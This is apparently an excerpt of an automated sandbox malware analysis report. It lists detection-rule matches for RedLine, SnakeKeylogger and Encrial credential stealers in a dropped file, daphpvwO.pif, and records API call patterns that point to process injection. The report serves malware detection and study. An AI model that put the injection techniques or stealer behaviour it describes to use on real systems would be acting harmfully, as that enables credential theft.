            Source: 5.2.daphpvwO.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 5.1.daphpvwO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 5.3.daphpvwO.pif.268f6d60.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.3.daphpvwO.pif.268f6d60.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.daphpvwO.pif.2aec0000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.daphpvwO.pif.2aec0000.9.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.1.daphpvwO.pif.438038.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 5.2.daphpvwO.pif.438038.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.ja811MqV4h.exe.212705a8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.daphpvwO.pif.298e6458.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.daphpvwO.pif.298e6458.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.daphpvwO.pif.298e5570.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.daphpvwO.pif.298e5570.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.daphpvwO.pif.28880ee8.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.daphpvwO.pif.28880ee8.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.daphpvwO.pif.2990e990.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.daphpvwO.pif.2990e990.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.daphpvwO.pif.28601b8e.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.daphpvwO.pif.28601b8e.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.daphpvwO.pif.28880000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.daphpvwO.pif.28880000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.daphpvwO.pif.28600ca6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.daphpvwO.pif.28600ca6.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.ja811MqV4h.exe.210c6e48.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 00000005.00000001.1321974377.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000005.00000002.3812458119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: daphpvwO.pif PID: 8816, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: C:\Users\user\Links\daphpvwO.pifProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D421C GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_029D421C
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D3380 NtWriteVirtualMemory,0_2_029D3380
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D3034 NtAllocateVirtualMemory,0_2_029D3034
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D9654 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_029D9654
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D9738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_029D9738
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D95CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_029D95CC
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D3B44 NtUnmapViewOfSection,0_2_029D3B44
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D38D4 NtReadVirtualMemory,0_2_029D38D4
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D421A GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_029D421A
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D3032 NtAllocateVirtualMemory,0_2_029D3032
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D9578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_029D9578
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029DA634 InetIsOffline,Sleep,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_029DA634
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029C20B40_2_029C20B4
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_00408C605_2_00408C60
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_0040DC115_2_0040DC11
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_00407C3F5_2_00407C3F
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_00418CCC5_2_00418CCC
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_00406CA05_2_00406CA0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_004028B05_2_004028B0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_0041A4BE5_2_0041A4BE
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_004182445_2_00418244
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_004016505_2_00401650
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_00402F205_2_00402F20
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_004193C45_2_004193C4
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_004187885_2_00418788
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_00402F895_2_00402F89
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_00402B905_2_00402B90
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_004073A05_2_004073A0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_284214485_2_28421448
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_284214385_2_28421438
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_284211985_2_28421198
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_284211A85_2_284211A8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5C6BF05_2_2B5C6BF0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5CB1105_2_2B5CB110
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5C3F085_2_2B5C3F08
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5CB7E05_2_2B5CB7E0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5C6BE05_2_2B5C6BE0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5CF2085_2_2B5CF208
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5CFAB85_2_2B5CFAB8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5CFAA85_2_2B5CFAA8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5CE9585_2_2B5CE958
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5CE9545_2_2B5CE954
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5CF1FA5_2_2B5CF1FA
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5CA7595_2_2B5CA759
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5CA7685_2_2B5CA768
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5C1F295_2_2B5C1F29
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5CF64F5_2_2B5CF64F
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5CF6605_2_2B5CF660
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5C3EF85_2_2B5C3EF8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5CEDB05_2_2B5CEDB0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5CEDA15_2_2B5CEDA1
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2B5C7CEF5_2_2B5C7CEF
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1400405_2_2C140040
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1430485_2_2C143048
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1454E05_2_2C1454E0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14E1785_2_2C14E178
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1462BA5_2_2C1462BA
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1406A05_2_2C1406A0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14D0145_2_2C14D014
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14AC105_2_2C14AC10
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14D0185_2_2C14D018
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14003E5_2_2C14003E
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14AC205_2_2C14AC20
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14D4705_2_2C14D470
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14B0785_2_2C14B078
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14D4615_2_2C14D461
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14B0685_2_2C14B068
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14D8BA5_2_2C14D8BA
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14B4D05_2_2C14B4D0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14B4C15_2_2C14B4C1
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14D8C85_2_2C14D8C8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14DD115_2_2C14DD11
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14B9185_2_2C14B918
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14DD205_2_2C14DD20
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14B9285_2_2C14B928
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14E1765_2_2C14E176
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14BD705_2_2C14BD70
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1489605_2_2C148960
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14BD805_2_2C14BD80
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C148DB85_2_2C148DB8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C148DA85_2_2C148DA8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14E5D05_2_2C14E5D0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14C1D85_2_2C14C1D8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14E5C15_2_2C14E5C1
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14C1C85_2_2C14C1C8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1492105_2_2C149210
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14EA185_2_2C14EA18
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1492005_2_2C149200
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1416385_2_2C141638
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1416275_2_2C141627
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14EA285_2_2C14EA28
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14965A5_2_2C14965A
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14EE705_2_2C14EE70
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1496685_2_2C149668
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C141A905_2_2C141A90
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C141A865_2_2C141A86
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14EE805_2_2C14EE80
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C149AB05_2_2C149AB0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C141ED85_2_2C141ED8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C149AC05_2_2C149AC0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C141EE85_2_2C141EE8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C149F185_2_2C149F18
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C149F0C5_2_2C149F0C
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14233C5_2_2C14233C
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14C7575_2_2C14C757
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1423405_2_2C142340
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14A3705_2_2C14A370
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14A3605_2_2C14A360
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14C7685_2_2C14C768
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1427965_2_2C142796
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1427985_2_2C142798
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14CBBE5_2_2C14CBBE
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14A7B95_2_2C14A7B9
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1487D85_2_2C1487D8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14CBC05_2_2C14CBC0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C14A7C85_2_2C14A7C8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C142BF05_2_2C142BF0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C142BE05_2_2C142BE0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D2EB85_2_2C1D2EB8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D28505_2_2C1D2850
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D0B305_2_2C1D0B30
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D40405_2_2C1D4040
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D21E85_2_2C1D21E8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D9CF05_2_2C1D9CF0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D1B805_2_2C1D1B80
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D93345_2_2C1D9334
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1DAC725_2_2C1DAC72
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D2EA85_2_2C1D2EA8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D88285_2_2C1D8828
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D88275_2_2C1D8827
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D28405_2_2C1D2840
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D0B205_2_2C1D0B20
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D40305_2_2C1D4030
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D00405_2_2C1D0040
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D21D85_2_2C1D21D8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D1B715_2_2C1D1B71
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D35505_2_2C1D3550
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D354E5_2_2C1D354E
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D92ED5_2_2C1D92ED
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2C1D93285_2_2C1D9328
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2CBAB3685_2_2CBAB368
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2CBA5CC85_2_2CBA5CC8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2CBA4A605_2_2CBA4A60
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_2CBAC6585_2_2CBAC658
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_00408C605_1_00408C60
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_0040DC115_1_0040DC11
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_00407C3F5_1_00407C3F
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_00418CCC5_1_00418CCC
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_00406CA05_1_00406CA0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_004028B05_1_004028B0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_0041A4BE5_1_0041A4BE
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_004182445_1_00418244
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_004016505_1_00401650
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_00402F205_1_00402F20
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_004193C45_1_004193C4
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_004187885_1_00418788
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_00402F895_1_00402F89
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_00402B905_1_00402B90
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_1_004073A05_1_004073A0
            Source: Joe Sandbox ViewDropped File: C:\Users\user\Links\daphpvwO.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: String function: 029D3E9C appears 45 times
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: String function: 029D3E20 appears 54 times
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: String function: 029C4414 appears 246 times
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: String function: 029C421C appears 64 times
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: String function: 029C457C appears 835 times
            Source: C:\Users\user\Links\daphpvwO.pifCode function: String function: 0040D606 appears 48 times
            Source: C:\Users\user\Links\daphpvwO.pifCode function: String function: 0040E1D8 appears 88 times
            Source: ja811MqV4h.exe, 00000000.00000003.1317716595.000000007F366000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs ja811MqV4h.exe
            Source: ja811MqV4h.exe, 00000000.00000003.1317716595.000000007F366000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs ja811MqV4h.exe
            Source: ja811MqV4h.exe, 00000000.00000002.1360135559.00000000210C6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs ja811MqV4h.exe
            Source: ja811MqV4h.exe, 00000000.00000003.1318064096.000000007F210000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs ja811MqV4h.exe
            Source: ja811MqV4h.exe, 00000000.00000002.1360529443.000000002125E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs ja811MqV4h.exe
            Source: ja811MqV4h.exe, 00000000.00000002.1359167957.0000000020796000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs ja811MqV4h.exe
            Source: ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206D9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs ja811MqV4h.exe
            Source: ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206D9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs ja811MqV4h.exe
            Source: ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs ja811MqV4h.exe
            Source: ja811MqV4h.exe, 00000000.00000002.1325858456.0000000000994000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs ja811MqV4h.exe
            Source: ja811MqV4h.exe, 00000000.00000003.1318791565.00000000009EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs ja811MqV4h.exe
            Source: ja811MqV4h.exe, 00000000.00000003.1318064096.000000007F256000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs ja811MqV4h.exe
            Source: ja811MqV4h.exe, 00000000.00000003.1318064096.000000007F256000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs ja811MqV4h.exe
            Source: ja811MqV4h.exe, 00000000.00000002.1359987570.0000000020F60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs ja811MqV4h.exe
            Source: ja811MqV4h.exe, 00000000.00000003.1318791565.00000000009BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs ja811MqV4h.exe
            Source: ja811MqV4h.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: 5.1.daphpvwO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 5.2.daphpvwO.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 5.2.daphpvwO.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 5.1.daphpvwO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
